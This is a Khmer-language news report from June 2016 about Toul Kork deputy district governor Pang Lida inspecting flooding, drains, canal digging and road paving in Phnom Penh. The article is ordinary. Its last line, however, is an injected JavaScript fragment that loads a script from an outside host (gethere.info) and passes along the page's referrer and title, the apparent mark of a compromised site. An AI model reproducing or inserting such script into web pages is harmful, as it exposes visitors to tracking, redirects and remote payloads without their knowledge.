លោកប៉ាង លីដា ចុះត្រួតពិនិត្យមើលការលិចទឹកផ្ទះប្រជាជន ពិនិត្យការដាក់លូរ និងចុះពិនិត្យកាយប្រឡាយ និង អ៊ុតកៅស៊ូ នៅរង្វង់មូលទួលគោក
ភ្នំពេញ ៖ ភាពសកម្មក្នុងការបម្រើប្រជាពលរដ្ឋក្នុង
មូលដ្ឋានរបស់អាជ្ញាធរខណ្ឌទួលគោក មានសភាពលេចធ្លោឡើងជាបន្តបន្ទាប់ នេះបើផ្នែកទៅលើសណ្តាប់ធ្នាប់ ដែលដឹកនាំដោយ លោកប៉ាង លីដា អភិបាលរងខណ្ឌទួលគោក ជាក់ស្តែងក្រោយពីបានរៀបចំនៅចំណុចផ្សារហេងលី និងតំបន់ខ្លះជិតផសារដេប៉ូ រួមមានរង្វង់មូលទួលគោកទៀតនោះ ទាំងនោះបានស្តែងអោយឃើញពីភាពកកស្ទះមួយចំនួនធំត្រូវបានកាត់បន្ថយ។ ដោយឡែកនាព្រឹក រហូតទល់ល្ងាចក្នុងថ្ងៃទី០២ ខែមិថុនា ឆ្នាំ២០១៦ នេះដែរ គេនៅតែឃើញសកម្មភាពរបស់ អភិបាលរងខណ្ឌរូបនេះ បានបន្តចុះត្រួតពិនិត្យមើលការលិចទឹកផ្ទះរបស់ប្រជាជន ចុះពិនិត្យការដាក់លូរចុះមើលដល់តាមផ្លូវលេខ៦០៨កែង៥៦៦ រហូតដល់វត្តនាគវន្ត័ និងល្ងាចចុះពិនិត្យកាយប្រឡាយ និង អ៊ុតកៅស៊ូ AC នៅរង្វង់មូលទួលគោក រហូតដល់វត្តនាគវន្ត័ ។
ជាថ្មីម្តងទៀត អភិបាលរងខណ្ឌលោកប៉ាង លីដា បានអោយបណ្តាញព័ត៌មានTNNដឹងទៀតថា លោកនៅតែសូមប្រជាពលរដ្ឋរបស់យើង ចូលរួមក្នុងការអភិវឌ្ឍ និងរៀបសណ្តាប់ធ្នាប់ទាំងអស់គ្នា ដើម្បីបញ្ចៀសការកក ស្ទះចរាចរណ៍។
ជាចុងក្រោយលោក សូមអោយបងៗ ពូៗ ដែលជាអ្នកជំនាញ មានតួនាទី ត្រូវហ៊ានទទួលខុសត្រូវ ( កុំបាចទឹកដាក់គេ – កុំភូតកុហក់ ថ្នាក់ដឹកនាំ ) ទើបប្រទេសជាតិរបស់យើងមានការអភិវឌ្ឍន៍ ជឿនលឿនទៅបាន ។
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;